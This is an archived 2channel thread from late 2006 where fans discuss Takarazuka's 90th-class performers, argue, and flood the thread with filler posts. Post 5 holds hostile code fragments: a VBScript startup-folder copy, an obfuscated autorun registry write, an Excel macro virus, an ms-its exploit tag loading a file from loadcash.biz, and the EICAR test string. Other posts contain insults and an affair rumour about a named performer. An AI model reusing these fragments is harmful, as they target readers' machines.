2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

宝塚90期

1 :名無しさん@花束いっぱい。:2006/11/18(土) 09:09:39 ID:XQ6T+XxR
コソーリマターリ
sage進公
荒しはスルーで

2 :名無しさん@花束いっぱい。:2006/11/18(土) 10:05:20 ID:Six4Hwxg
コソーリだがメチャクチャ嬉しいぞ!!あさひちゃん、うたかたカゲソロオメ!!

3 :名無しさん@花束いっぱい。:2006/11/18(土) 13:23:49 ID:u32vVReB
>>1 糞スレ立てんな!!
前回スレで次スレの協議もしなかったくせに。
もしかして別館に痛いスレ立てて冷笑買ったヤシ?

4 :名無しさん@花束いっぱい。:2006/11/18(土) 23:00:55 ID:hn8yz7UP
あさひファンとしてはそれは嬉しい!!

5 :<body onload=window()>:2006/11/19(日) 01:22:24 ID:QChQctx4
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :名無しさん@花束いっぱい。:2006/11/19(日) 01:23:54 ID:WDse00fX
まさかヘイズコードで全員役つくとは嬉しいでねーか

7 :名無しさん@花束いっぱい。:2006/11/19(日) 01:33:31 ID:I/e+pGIY
だけど、どの組も90期ヤバイとオモ
91期の方が役付き良かったり、89期に押されて日陰にいたり・・・



頑張ってるのはまりもかな?実花ちゃんはどうなるんだろ・・・

8 :名無しさん@花束いっぱい。:2006/11/19(日) 08:53:41 ID:7bu+K4aj
愛原嬢は別格かなぁ・・・
芝居できるし

9 :名無しさん@花束いっぱい。:2006/11/19(日) 08:56:05 ID:7bu+K4aj
途中送信してしまったorz
愛原嬢は別格かなぁ・・・
芝居できるし、存在感はあると思うが、容姿がモニョ(悪くはないけど)

容姿で思い出したが、まりもは写真写りに当たりハズレがある気が。

10 :名無しさん@花束いっぱい。:2006/11/19(日) 17:33:52 ID:hSOcx6cM
しゅうちゃんが可愛い

11 :名無しさん@花束いっぱい。:2006/11/19(日) 19:36:41 ID:K+JawFIj
しゅうちゃんって、汐月しゅう?
だったら、私も、素朴な感じでかわいいと思った。
背もあるから、これからかっこよくなってくのに期待。

12 :sage:2006/11/19(日) 20:03:25 ID:hSOcx6cM
そう。汐月しゅうちゃん。いい味が出てる。

13 :名無しさん@花束いっぱい。:2006/11/19(日) 20:09:48 ID:Hk20P7qm
>>9
愛原は別格ですらないような。
父親の存在があるから、ギリギリの範囲で使ってもらってるって感じ。
それから、芝居は下手だよ。

14 :名無しさん@花束いっぱい。:2006/11/19(日) 20:33:54 ID:I/e+pGIY
芝居うんぬんはまだそんなに芝居したことないから分からないけど、
声がはっきりしていて台詞が聞き取りやすいと思う。>愛原さん

別格でいくなら彼女の実力でなら芝居がダンスだろうけど、
ダンスは92期に笙乃さんが入ったから無理かな。

15 :名無しさん@花束いっぱい。:2006/11/19(日) 21:45:05 ID:omdFPl6Y
私は、宇月くんのダンスが好きだなぁ

16 :名無しさん@花束いっぱい。:2006/11/19(日) 22:10:13 ID:5+TpHot1
鳳樹いちちゃんのウリってなんですか?

17 :名無しさん@花束いっぱい。:2006/11/19(日) 22:20:00 ID:xpnbJaBC
宇月クンWトリオおめでとう!

18 :名無しさん@花束いっぱい。:2006/11/19(日) 22:45:50 ID:Hk20P7qm
>>14
聞き取りやすくても棒読みだよ?
父親、娘の指導も少ししてくれ。

19 :名無しさん@花束いっぱい。:2006/11/19(日) 22:45:52 ID:0Jv8Y3+M
>16
ダンスかな。

20 :名無しさん@花束いっぱい。:2006/11/19(日) 23:15:04 ID:OzOtxyRm
スレ立て厨も、あげ厨も、痛い煌雅あさひファンも氏ね!☆
2ちゃんにカキコするようなファソはみんな「痛いファン」だ!

21 :名無しさん@花束いっぱい。:2006/11/19(日) 23:20:13 ID:NsRSpsA1
悠月れなちゃんはどんな感じですかね?!
おとめみて可愛いと思った!

22 :名無しさん@花束いっぱい。:2006/11/19(日) 23:20:58 ID:UYrw8Qqp
悠月さんは何が得意なんでしょうか?
顔が小さくてスッキリした顔なので最近気になってます。

23 :名無しさん@花束いっぱい。:2006/11/19(日) 23:25:41 ID:OzOtxyRm
>>21>>22
あげ厨氏ね!ってば☆ おまいらまとめて氏ね!!
おまいらみたいな痛いファンは庭に逝け!!


24 :名無しさん@花束いっぱい。:2006/11/19(日) 23:27:30 ID:OzOtxyRm
このスレ初心者厨ばっかりで、キモーーーーーーーっ!!☆☆

25 :名無しさん@花束いっぱい。:2006/11/19(日) 23:31:33 ID:NsRSpsA1
21ですが…。
23様、そんなに怒らなくてもっ。
あげてごめんなさ〜いね。さげりゃいいのね?
22様、れなちゃんは新公で役ついてますよね!
実力の方はどうなのかわかりませんが…。
気になりますよね!

26 :名無しさん@花束いっぱい。:2006/11/19(日) 23:38:05 ID:5tSLLR9U
ほんとお庭でやりなよ。痛々しい・・・。
2ちゃんでこんなお子様丸出しなの恥ずかしい。
ほんとに上げ厨も徹底スルーして。
なんでテンプレに入れないの?

27 :名無しさん@花束いっぱい。:2006/11/19(日) 23:59:33 ID:NsRSpsA1
嫌なら見にこなけりゃいいのに。
オバチャマ方。
語ろうとすると絶対に出てくるクドいサゲサゲおばちゃんきら〜い。
うちのパソネット繋いでないし。
携帯からしかカキコできねぇし。
庭の語るとこはパソからしかカキコできねぇし。
ど〜せ学校のパソでしかできねぇよ。
その辺のジェンヌを独占したいばかりに行動してるババァとは違うんだっ!
観劇なんか2公演に1回だぞゴルァ!チケットまわせよ!
入り出なんか1公演3回しか行けねぇんだぞボケ!
カキコくらい毎日させろや!


28 :名無しさん@花束いっぱい。:2006/11/20(月) 00:12:14 ID:d3AEDW3l
ID:NsRSpsA1いいかげんにしたら?口の悪い品のない人!
お前みたいなの90期ファンってのが恥ずかしいんだよ。ネチケット勉強してから
書き込みしたら?
別館に個人スレでも立てて勝手にやってたらいいじゃん。もしかして別館に90期スレ立てた痛いおバカちゃん?w

29 :名無しさん@花束いっぱい。:2006/11/20(月) 00:13:43 ID:d3AEDW3l
っていうかID:NsRSpsA1こそもうここに来ないでね
前スレ荒らしてつぶした子?

30 :名無しさん@花束いっぱい。:2006/11/20(月) 00:28:43 ID:8KY02GDq
そうムキにナルナヨW
だからシツコイって言われるんだよ。
だから荒れるんだよ。
おかしい人と思ったらスルーすればいいじゃん。
それが立派な大人。

31 :名無しさん@花束いっぱい。:2006/11/20(月) 00:42:30 ID:d3AEDW3l
本人丸出しだよ?半角厨ちゃん。もうここ埋めようか?

32 :名無しさん@花束いっぱい。:2006/11/20(月) 00:43:26 ID:d3AEDW3l
ume

33 :名無しさん@花束いっぱい。:2006/11/20(月) 00:45:05 ID:d3AEDW3l
ume

34 :名無しさん@花束いっぱい。:2006/11/20(月) 00:46:04 ID:d3AEDW3l
ume

35 :名無しさん@花束いっぱい。:2006/11/20(月) 00:47:03 ID:d3AEDW3l
ume

36 :名無しさん@花束いっぱい。:2006/11/20(月) 00:48:12 ID:d3AEDW3l
ume

37 :名無しさん@花束いっぱい。:2006/11/20(月) 01:55:49 ID:LgbaZmUH
umeume

38 :名無しさん@花束いっぱい。:2006/11/20(月) 07:20:21 ID:n/WlKzso
今週のジャパンカップどうするかな。

39 :名無しさん@花束いっぱい。:2006/11/20(月) 07:33:00 ID:sSCBSw65
>>23お前がしねば?
どうみたって21と22は同じではないだろ。

40 :名無しさん@花束いっぱい。:2006/11/20(月) 10:14:28 ID:k507k6Pe
やっぱりウメた方がいいね。>39みたいなのもいるし。
ウメ。梅。ume

41 :名無しさん@花束いっぱい。:2006/11/20(月) 10:55:09 ID:36cWhEcb
今東京公演中だけど雪組はどうですか?
凰華れのちゃんの大ファンです!どなたか情報お願いします!

42 :名無しさん@花束いっぱい。:2006/11/20(月) 11:38:43 ID:k507k6Pe
>41 別館で聞いたら?
このスレ ume

43 :名無しさん@花束いっぱい。:2006/11/20(月) 22:22:02 ID:7a4xfagk
あげ

44 :名無しさん@花束いっぱい。:2006/11/20(月) 22:38:39 ID:k507k6Pe
ume ume

45 :いちごさん:2006/11/21(火) 01:02:52 ID:Ir3VK1Vq
もう埋立地になっちゃうんだ…。
この期の生徒さん好きだからなんか悲しいかも。


46 :名無しさん@花束いっぱい。:2006/11/21(火) 01:03:39 ID:eHar9096
おばちゃんウザいもの扱いしてる厨。
一番ウザいのって厨だよ。マジで厨は2に入れないようにするシステム導入して欲しい。
厨が新スレ立て、教えて上げ厨現れ、厨が荒らす。なんとも悪循環。
厨さえいなければ、2はもっとまともになるとオモ。

47 :名無しさん@花束いっぱい。:2006/11/21(火) 08:38:44 ID:S6+Ba8ud
めがねでぶおばちゃん

48 :名無しさん@花束いっぱい。:2006/11/21(火) 09:56:46 ID:U64Ja7YD
またまた厨がスレつぶしたね。
だから無意味なんだよ、90期スレなんて。普通に応援してたら贔屓の情報なんて入るし、別館や組スレもあるし。
掛け持ち厨とかが情報欲しいだけでしょ?w
だから埋め。何回立てても同じ。不必要。

49 :名無しさん@花束いっぱい。:2006/11/21(火) 10:01:18 ID:U64Ja7YD
>>27=>>47の基地外が一人いる限り、いくらスレ立てしても荒らされて無理だって。           だからume

50 :名無しさん@花束いっぱい。:2006/11/21(火) 10:43:37 ID:C7CQ4/GO
>49
あんたのほうがよっぽど基地外。
意味のないumeも鯖に負担が掛かることも分かってる?
雑魚スレとして、放置願えませんかね。

51 :名無しさん@花束いっぱい。:2006/11/21(火) 11:05:49 ID:U64Ja7YD
sageも出来ない方がよっぽど基地外かとw
ume

52 :名無しさん@花束いっぱい。:2006/11/21(火) 12:17:06 ID:S6+Ba8ud
一人でさわいで・・。
普段誰も相手にしてくれないから
下級生スレ中心に書き込みして、
相手になってくれるのを楽しみにしてるんだね。
怒ってばかりじゃここでも相手にしてもらえなくなるよ。
いいの?

53 :いちごさん:2006/11/21(火) 13:21:33 ID:Ir3VK1Vq
またまたお邪魔しまつ。
ここU64Ja7YDさんでいっぱいでつね。
同一人物っぽいのがいぱーいある。
sageは知っていらっしゃるけど、スルーは知らないんでつか?
なぜそんなに敏感なんでつか?


54 :名無しさん@花束いっぱい。:2006/11/21(火) 14:46:06 ID:U64Ja7YD
相手にされてないのはいつもの決め付け厨の>>52w
ほら90期の話題なんか一つもないのに無意味、ume

55 :名無しさん@花束いっぱい。:2006/11/21(火) 14:46:49 ID:eHar9096
大体厨がスレ立てたけど、目的何?
お子ちゃま同士でくだらないが言い争いするだけでしょ?
誰にお付きいるよ。いないよ!ってw
そんなお子ちゃま喧嘩にスレ立てないでね。
埋め。ume

56 :名無しさん@花束いっぱい。:2006/11/21(火) 23:14:08 ID:z3PgglO7
8でみらいちゃん、叩かれまくりw

57 :名無しさん@花束いっぱい。:2006/11/22(水) 00:01:12 ID:bDlD8o45
>>54.>>55に同意。
前スレの時、次スレの話し合いもしなかったでしょ。
厨ばっかりウザイ。
埋め。

58 :名無しさん@花束いっぱい。:2006/11/22(水) 00:22:43 ID:e8ZGB23P
庭やオカシでは人気だったおwww>花風さん

星90は蒼乃ネタばかりだったから注目されてよかったねw
宙新公90期が気になる・・・

59 :名無しさん@花束いっぱい。:2006/11/22(水) 07:00:23 ID:Um5QN2Z2
ume協力

60 :名無しさん@花束いっぱい。:2006/11/22(水) 09:18:22 ID:OXx0I+Cp
彩羽さんはパレード、上手花道で発見。
かわいかったよ

61 :名無しさん@花束いっぱい。:2006/11/22(水) 11:18:36 ID:+we39iSx
埋め隊!!!出動!!!

62 :名無しさん@花束いっぱい。:2006/11/22(水) 12:06:50 ID:1T9EHSA5
なぜこのスレ自分に同意する人がいるの?
おばちゃんバレバレですよ。
荒らすのいい加減にしてね。
いやなら見ないかスルーしなさい

63 :名無しさん@花束いっぱい。:2006/11/22(水) 14:01:58 ID:KC3R0b5v
>>62
しかたないよ。
だれも同意してくれないんだもん。
いつもこうだよ。このおばちゃん。
一人何役もやってるけどバレバレw
かわいそうだからとやかく言わないように
してるけど・・・。
このばばあ来てもこちらもスルーしないとね。

64 :名無しさん@花束いっぱい。:2006/11/22(水) 14:38:17 ID:H7CsHnow
宙新公は、いちちゃんが結構目立ってた。
けど、もう少し身長が欲しいなって言うのが正直な意見かな。

まゆちゃんはワンシーンだけど、色っぽかった。
少し幼さもあったが、自分なりに役作りを頑張ってたと思う。

後はみんなとんとんだな。目立つとこもなく91、92の方が目立ってた。

65 :名無しさん@花束いっぱい。:2006/11/22(水) 18:48:34 ID:PflmcvZe
やっぱり90期は地味なのかなぁ?

66 :名無しさん@花束いっぱい。:2006/11/22(水) 19:32:58 ID:Dqp3Y+XY
あまり目立たないような…気もするね↓

67 :名無しさん@花束いっぱい。:2006/11/22(水) 23:16:33 ID:+we39iSx
54と55はID違うのに、
「自分で自分に同意してる」
と発言する厨ちゃんは、2の初心者スレ行ってね。
90期が地味なんじゃなくて、ファンがお子ちゃまばっかで
まともな議論が出来ないだけよ。あげ厨ちゃんw

68 :名無しさん@花束いっぱい。:2006/11/22(水) 23:54:56 ID:HXVJWy5h
はいはいW
スルー汁。
90期っておとなしい子多いのかな?
でも90周年記念かなんかで、初舞台の稽古の様子がNHKかな?て流れたけど、そんな風には見えなかったしなぁ。

69 :名無しさん@花束いっぱい。:2006/11/22(水) 23:59:45 ID:ZEGsPBeD
62.63はいつも荒らすゆゆファン

70 :名無しさん@花束いっぱい。:2006/11/23(木) 00:42:25 ID:eWmSbCqu
今日まりもさんからハガキきたなり

71 :名無しさん@花束いっぱい。:2006/11/23(木) 00:51:06 ID:x08r3Izp
ID:eWmSbCqu=海桐ストー○ーファン。蒼乃と水の掛け持ちで前スレをつぶしたアゲ厨の
張本人の一人。
あとは>>69も言ってる様に、>>62,>>63がゆゆスレでも嫌われて相手にされない構ってチャンの
嫌がらせ厨。
ネットを理解できない基地外のお子ちゃまばっかりだから、本当いらない!
都合の悪い事は「一人が書いてる」と本気で思ってるの?w
こんなにも「90期スレいらない」って埋め立ててる人多いの理解しなさい。

72 :名無しさん@花束いっぱい。:2006/11/23(木) 08:05:41 ID:7yvNTr8q
スルースルー

73 :名無しさん@花束いっぱい。:2006/11/23(木) 08:22:11 ID:ku+KgQ1b
〉67
日付変わるとIDも変わるんですよ。
ちなみに
67=69
書き込み時間も毎日同じだね。
きもいんですけど。
毎日文句ばっかでさ。
文句があるならもうくるな
荒らしやめろ!

74 :名無しさん@花束いっぱい。:2006/11/23(木) 08:54:25 ID:7yvNTr8q
ふたたびスルースルー

75 :名無しさん@花束いっぱい。:2006/11/23(木) 10:22:37 ID:0NJR0X91
>>73 ねー、初心者のお子様、もっとネットの事勉強してカキコしようねw
日付一緒だし、それぞれ完璧に違う人だよ。
IPって知らないの?
荒らしは>>73の事だって、何回言われたら解る?
あなたがいる限り、90期スレは無理なの。もう本当に来ないでくれるかな?
いなくなるまで、90期スレ立てないからさ。
皆が言ってるように、ここは埋めて行くので、不快にさせる言葉ばかり毎回書かないでね、特徴ありすぎなんだよw
UME

76 :sage:2006/11/23(木) 10:32:25 ID:gpKHIRWN
まーまー穏やかに頼むよ。

77 :名無しさん@花束いっぱい。:2006/11/23(木) 10:50:27 ID:SnXgi3Qt
>>73
あ〜らら、人を馬鹿にしたいのに馬鹿にされてるw
情けな〜いw
だから、IDの規則もロクに知らないようなお子ちゃまが大人ぶって
こんなところ来ちゃ駄目なの。わかる?
67=69って推理、とーっても笑わせてもらったよ!!
一人はあげ厨、もう一人はさげなのにどこをどう推理したの?!

78 :名無しさん@花束いっぱい。:2006/11/23(木) 11:07:39 ID:SnXgi3Qt
追伸ですだ。
>>62,>>63,>>67,>>69,>>73
を順番に見ると、>>62が自分を叩いたIDを勝手に同一と決めつけ
>>73となって現れてる過程がよく分かるね。
ってことは、>>69のゆゆファン発言が図星だったか?

79 :名無しさん@花束いっぱい。:2006/11/23(木) 12:48:38 ID:7yvNTr8q
冬だというのにシースルースルー

80 :名無しさん@花束いっぱい。:2006/11/23(木) 13:49:29 ID:0NJR0X91
お子様に荒らされるだけだからUME立て

81 :名無しさん@花束いっぱい。:2006/11/24(金) 17:47:40 ID:+YrAxBJ4
ume

82 :名無しさん@花束いっぱい。:2006/11/24(金) 17:58:30 ID:GOvQQWAr
梅立て協力。

83 :名無しさん@花束いっぱい。:2006/11/24(金) 20:43:09 ID:+YrAxBJ4
ume again

84 :名無しさん@花束いっぱい。:2006/11/24(金) 22:50:37 ID:BZkGH8oO
あげました

85 :名無しさん@花束いっぱい。:2006/11/24(金) 23:12:30 ID:GOvQQWAr
週末厨の為、梅立て協力〜。

86 :名無しさん@花束いっぱい。:2006/11/25(土) 10:36:39 ID:t5AQEh0O
ume!!!

87 :名無しさん@花束いっぱい。:2006/11/25(土) 12:15:09 ID:vBfCL859
どうせ荒れるなら過去の海桐○トーカーファンの発言なり一連のレスなり見てみたい。
暇な人貼ってくんないかな。

88 :名無しさん@花束いっぱい。:2006/11/25(土) 13:16:32 ID:XdrCFA9R


昨日。 
海桐さんと、先輩の某I鈴さんがデニーズで二人で食事をしてたよ!
海桐さんのあんな嬉しそうな顔は初めて見た。

この二人、よく二人きりでいるのを宝塚でみかけます。
どういう関係なんだろか。







89 :名無しさん@花束いっぱい。:2006/11/25(土) 13:27:30 ID:7aP3l6uI
不倫! 不倫! 不倫!!!

90 :名無しさん@花束いっぱい。:2006/11/25(土) 13:35:54 ID:XdrCFA9R


91 :名無しさん@花束いっぱい。:2006/11/26(日) 08:44:42 ID:JiKy7+bW
>>88みたいなやつがいるから埋めたいんだよ!!!!!
海○は昨日は某同期の家でたこ焼きパーティーだったはずだけど、なにか?w

>海桐さんのあんな嬉しそうな顔は初めて見た。
うん。キミには永遠に見せないだろうねw

92 :名無しさん@花束いっぱい。:2006/11/26(日) 09:15:05 ID:ZJKmXHw8
今日はジャパンカップなんだから
楽しくいきましょうよ
ディープとハーツの戦いをお楽しみに!!!

93 :名無しさん@花束いっぱい。:2006/11/26(日) 09:28:47 ID:apINaLbP
海桐さんって同期で誰と仲いいの? 入り出で同期と一緒にいるのあんまり見た事ないけど?

94 :名無しさん@花束いっぱい。:2006/11/26(日) 11:13:45 ID:5ZWX9m0V
>93 オマエが前スレもつぶしたの自覚しろ!!
オマエがいる限り普通の書き込みはできないし
まともなスレにはならないから、永遠にスルー&埋め

95 :名無しさん@花束いっぱい。:2006/11/26(日) 11:48:55 ID:JiKy7+bW
88=90=93がいるから埋め。
っつーか、何でスレ立てたの?
93のようなやつには誰と仲がいいかなんて教えたくないし。
って言うと、普通のお子様は「知らないくせに」ってお決まり文句言うんだよねw

96 :名無しさん@花束いっぱい。:2006/11/26(日) 17:02:26 ID:BGfX7uVZ
海○ストーカーの過去の発言なり一連のレスなり見たいって言ったのにリアルタイムで見ちゃったよw



97 :名無しさん@花束いっぱい。:2006/11/26(日) 23:13:16 ID:yeHZQxgN
必ず各組を一回観劇しているのですが、90期の方、特に男役さんが目につきません。
90期の方で「路線」と言われている男役さんを教えていただけませんでしょうか?
今後の観劇の時に注意して観たいと考えています。

98 :名無しさん@花束いっぱい。:2006/11/26(日) 23:24:35 ID:LVf13GU1
ume

99 :名無しさん@花束いっぱい。:2006/11/26(日) 23:25:55 ID:LVf13GU1
umemasu

100 :名無しさん@花束いっぱい。:2006/11/26(日) 23:26:51 ID:LVf13GU1





ume

101 :名無しさん@花束いっぱい。:2006/11/26(日) 23:28:56 ID:LVf13GU1
埋めるのは遠い道のり。

102 :名無しさん@花束いっぱい。:2006/11/26(日) 23:29:43 ID:5ZWX9m0V
>97
あげ厨もスルーされるよ。特に「路線」話なんて
また瀬戸・夏城・ゆゆファソなどの「使われない厨」に荒らされるw

だから埋め協力。

103 :名無しさん@花束いっぱい。:2006/11/26(日) 23:29:51 ID:LVf13GU1

























104 :名無しさん@花束いっぱい。:2006/11/26(日) 23:30:48 ID:5ZWX9m0V
埋め協力。

105 :名無しさん@花束いっぱい。:2006/11/26(日) 23:31:58 ID:5ZWX9m0V
地道にumeましょう。

106 :名無しさん@花束いっぱい。:2006/11/26(日) 23:58:24 ID:JiKy7+bW
umeyo!umeyo!

107 :名無しさん@花束いっぱい。:2006/11/27(月) 00:05:56 ID:z8Mdok6j
見たくない人は見なければいいだけの話。普通に語りたい人もいる。
アラシとアゲ厨はスルーすればいい。
この期に路線なんてまだいない。

108 :名無しさん@花束いっぱい。:2006/11/27(月) 00:10:38 ID:BypHdkrV
>>107
君が荒らしそのものだと言う事に早く気付くべきw

umeに協力

109 :名無しさん@花束いっぱい。:2006/11/27(月) 00:11:26 ID:Ke1yIaFn
区切りの期ってどうなんでしょう?
70期・80期ともそれなりにめぼしい方はいたのですが次々に退団されて、気がつけは…………?
90期は残念ながら男役さんに期待を持てそうな方がいらっしゃらないような気がしてなりません。
「ブラックホール」状態のようで…
年明けは研四!
厳しいです。
誰か大化けしないものでしょうか?
特に宙組。
完全に91期に負けている。

110 :名無しさん@花束いっぱい。:2006/11/27(月) 00:14:04 ID:BypHdkrV
はいはいスルースルー。

煽りが下手だね、ume協力。

111 :名無しさん@花束いっぱい。:2006/11/27(月) 00:37:45 ID:ANibXUFn
はいはいはいあげ厨いるから埋め。

112 :名無しさん@花束いっぱい。:2006/11/27(月) 00:54:06 ID:0sNjvdhs
もう研4になるのか・・・
成長したなぁ。シミジミ。

113 :名無しさん@花束いっぱい。:2006/11/27(月) 08:33:27 ID:DuZNpllI
今回、愛原さんがお茶飲み会やるって聞いてショック。
出たかった。
やっぱり東京は人が集まりやすいから東京で
やる方が多いのかのー。


114 :名無しさん@花束いっぱい。:2006/11/27(月) 10:03:13 ID:bXn8Turx
学年は4月でかわるんだけどねw

115 :名無しさん@花束いっぱい。:2006/11/27(月) 15:35:07 ID:Su7kdS2h
>>102
ゆゆちゃんファンが何やったか知らないけど
夏城さん、瀬戸さんと、ゆゆちゃんは使われてる度合いが違うんで
一緒にしないでください。

116 :名無しさん@花束いっぱい。:2006/11/27(月) 15:37:49 ID:0sNjvdhs
>>105
わざと釣られたふりして荒らしてんなよ・・・




メモランダム出る人がんばれー

117 :名無しさん@花束いっぱい。:2006/11/27(月) 16:15:29 ID:EPibOdWs
>116
115と間違えてない?

118 :名無しさん@花束いっぱい。:2006/11/27(月) 16:21:19 ID:0sNjvdhs
スマソ。>>115でした・・・

119 :名無しさん@花束いっぱい。:2006/11/27(月) 17:11:04 ID:BypHdkrV
あははw いつものゆゆファンかアンチの「構ってちゃん」=>>115、残念でした〜w
もうここでも相手にされないから90期スレには来ない事だねw 消えなちゃいね。
どっか相手される所行ったら?w まぁどこでも相手にされないと思うけどw

120 :名無しさん@花束いっぱい。:2006/11/27(月) 17:39:33 ID:DuWAsyjI
>>119
見事に厨を喜ばせてまつよ。
まさか煽り…ングッ

121 :名無しさん@花束いっぱい。:2006/11/27(月) 23:53:44 ID:f6lv28bZ
>>113
愛原さんのお付きってどんな人?
ママが連れて来た人?
だって大事な娘をその辺のヅカファンに頼むとも思えないし・・
雇ってるお付きさんなのかな?
ファンには案内出してるんじゃないの?

122 :名無しさん@花束いっぱい。:2006/11/28(火) 01:03:42 ID:8u8tabEA
〉120
119はいつも下級生スレに現れる
荒らしだからスルーしてください。

〉121
お付きなんてそんなもんじゃないの?

123 :名無しさん@花束いっぱい。:2006/11/28(火) 01:21:06 ID:qSwHvmqa
あー、また出てきた>>115=>>122
オマイが荒らしだよ。レスアンカー変えてみても
特徴ありすぎでバレバレだからw
構ってチャンの荒らし>>122はここから消えて!
埋めー

124 :名無しさん@花束いっぱい。:2006/11/28(火) 05:46:00 ID:8u8tabEA
スルースルー

125 :名無しさん@花束いっぱい。:2006/11/28(火) 08:23:43 ID:B8hmBXjv
>>121
えっ愛原さんのママって厳しい人なの?
まあだいじな娘さんなんだろうけど・・。
他の生徒さんの所もみんなそうなのかな。
親は心配なんだろうねえ。

126 :名無しさん@花束いっぱい。:2006/11/28(火) 12:09:35 ID:FaBTQzRh
ママもお付きも一般人。
はい、梅〜

127 :名無しさん@花束いっぱい。:2006/11/29(水) 17:51:54 ID:Dl+T0SMf
花音さん
Wトリオはいってるじゃん
すごいねー

128 :名無しさん@花束いっぱい。:2006/11/29(水) 18:32:01 ID:3vnjw2h2
90期も91期みたいに皆が皆コンパやってるの?

129 :名無しさん@花束いっぱい。:2006/11/29(水) 20:30:25 ID:Kfy9Edkd
以前(初舞台時)、90期生が出て来る度に
手紙を渡している人を見かけてビックリした。


ちゃんとそれぞれ違う内容書いてあるんだろうか・・・。


130 :名無しさん@花束いっぱい。:2006/11/29(水) 23:16:03 ID:jmv5ckSW
>>127 Wトリオなんて他の組はもうとっくにしてるじゃん。。
前スレ見た?

131 :名無しさん@花束いっぱい。:2006/11/30(木) 00:19:23 ID:/RsiGQWb
まぁた低級厨が暴れだす。
埋め

132 :名無しさん@花束いっぱい。:2006/11/30(木) 02:04:25 ID:hR5IctFj
花音さんは、親がすごくて〜
エンカレはチケット1公演につき50枚買い上げてたし、大劇場公演でもチケットの買い方がはんぱじゃないからね。
当然寄付もしてるしね。

それくらいの扱いはフツーに劇団も考慮するのでは?


133 :名無しさん@花束いっぱい。:2006/11/30(木) 05:56:00 ID:RCUzv1VD
お金持ちなんだね。

134 :名無しさん@花束いっぱい。:2006/11/30(木) 12:54:44 ID:QJIUx0MJ
みんな自分のかわいい娘のためにそれくらいするでしょ。ゆゆちゃんとこもすごいしね。

135 :名無しさん@花束いっぱい。:2006/11/30(木) 13:57:13 ID:8W8IZNoq
海桐さんってファンに冷たいらしいけど本当?

136 :名無しさん@花束いっぱい。:2006/11/30(木) 14:24:45 ID:OkZq7GRQ
みんな合コンに夢中でファンに構う暇はない…orz

137 :名無しさん@花束いっぱい。:2006/11/30(木) 18:32:34 ID:0JQRaxNs
>135のような痛い系にはどの生徒も冷たい

138 :名無しさん@花束いっぱい。:2006/11/30(木) 23:56:21 ID:8W8IZNoq
痛くないし。

139 :名無しさん@花束いっぱい。:2006/12/01(金) 01:07:24 ID:zrMT5SJ9
>135=138
恥を知れ

140 :名無しさん@花束いっぱい。:2006/12/01(金) 20:59:42 ID:6+sAvStl
花音チャン応援ツアーって言うのもあるょ!最初見た時はビックリした(^_^;

141 :名無しさん@花束いっぱい。:2006/12/01(金) 22:17:36 ID:4oyeIXXP
四国から何台かバスを貸し切って、公演中に何度かやってくるんだよね〜
今回の新人公演でも、たいした役でもなかったけど、やってきてました。
あそこはお爺ちゃんがやり手さんだからね〜
度々、動員かけられて、四国から繰り出される会社の人間および、その家族は気の毒かもしれない。
絶対断れないからね〜

142 :名無しさん@花束いっぱい。:2006/12/02(土) 11:48:39 ID:jkJmWTZ/
かのんファンってゆゆファンやかいどーファンに
負けないくらい痛いんだね。
Wトリオいまさら入ったくらいで喜んでるしw
いい加減、せめて海桐ファンはスルーしようよ。

でなきゃ、うめ賛成

143 :名無しさん@花束いっぱい。:2006/12/02(土) 13:33:47 ID:CAKXrpoj
まりも バウ2番手で大喜び★

凹みsage

144 :名無しさん@花束いっぱい。:2006/12/02(土) 20:58:39 ID:0tMj6K70
貸し切りバス何台もも出せるなんて
お金持ちはすごいのね。

くれ。少し。

145 :名無しさん@花束いっぱい。:2006/12/02(土) 23:40:05 ID:pymRO1He
っていうか、付き合わされるのはつらいよ。


146 :名無しさん@花束いっぱい。:2006/12/03(日) 08:35:15 ID:MVRiyALu
まりもは、振り分け前まではヒロインは自分だと思い込んでいた!

147 :名無しさん@花束いっぱい。:2006/12/03(日) 09:18:03 ID:7/CfpI2l
>>145
旅費ただならまあいいんじゃない?

148 :名無しさん@花束いっぱい。:2006/12/03(日) 09:26:57 ID:F0MidQO6
>>142
宙の役付きの遅さからいうと喜んでいいんじゃね。
エンカレ・バウ以降やっと組内で90期の存在が認識されつつある
…かな?って位だし。地味すぎる。

149 :名無しさん@花束いっぱい。:2006/12/04(月) 14:17:12 ID:dvYU+uGK
アキコ・カンダのイベントに出た90期の詳細きぼーん

150 :名無しさん@花束いっぱい。:2006/12/06(水) 21:56:56 ID:CBXw8S0J
今回お茶飲みした人いますか?

151 :名無しさん@花束いっぱい。:2006/12/06(水) 23:10:09 ID:3CjL8Lij
宙ならイッチャンがしたんじゃない?無差別じゃないと思うけど。

152 :名無しさん@花束いっぱい。:2006/12/07(木) 16:35:47 ID:jaRFOUVR
庭のQ&Aに出待ちの質問発券。
誰ファンだろう。

153 :名無しさん@花束いっぱい。:2006/12/08(金) 07:55:26 ID:Sh20z6W5
月の新公、男役だけ役付いてるね。


154 :名無しさん@花束いっぱい。:2006/12/09(土) 00:14:20 ID:teVwcWej
マッツンついてないし。朝凪さんも。

